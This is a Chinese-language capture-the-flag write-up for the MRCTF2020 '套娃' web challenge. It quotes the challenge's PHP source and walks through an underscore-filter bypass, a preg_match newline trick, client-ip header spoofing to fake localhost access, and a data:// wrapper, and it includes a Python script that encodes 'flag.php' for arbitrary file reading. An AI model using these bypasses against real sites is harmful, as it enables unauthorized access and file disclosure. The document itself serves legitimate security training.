[MRCTF2020]套娃
题目链接:[MRCTF2020]套娃
1.查看网页源码
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
给出了php源码
第一个if考察$_SERVER['QUERY_STRING']获取的是未经url解码的查询字符串,因此将_url编码后可绕过。(url编码大小写不敏感)
第二个if考察preg_match()只能匹配单行字符串,会将换行符后的字符串忽略。
?b%5Fu%5Fp%5Ft=23333%0a
2.secrettw.php
查看网页源码,发现jsfuck编码字符串,输入浏览器执行。提示尝试POST方式提交Merak参数
返回部分源码
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
猜测getIp()可能通过X-Forwarder-For或client-ip头可以绕过。
在请求头部添加
X-Forwarder-For: 127.0.0.1
client-ip: 127.0.0.1
file_get_contents($_GET['2333']) === 'todat is a happy day' )可由data:\\伪协议绕过
secrettw.php?2333=data://text/plain,todat+is+a+happy+day
空格需要url编码
change()函数将传入的字符串进行base64解码然后进行简单加密。
我们需要传入flag.php故需要先将flag.php逐字符进行加密,然后进行base64编码。
python解码脚本
import base64
cstr = "flag.php"
tmp = ""
for i in range(len(cstr)):
ch = chr(ord(cstr[i])- i*2)
tmp += ch
print(base64.b64encode(tmp.encode()))
最终请求参数:
http://6ad8a2e0-f0f7-49c9-8087-ac1021dbe1a2.node3.buuoj.cn/secrettw.php?2333=data://text/plain,todat+is+a+happy+day&file=ZmpdYSZmXGI%3D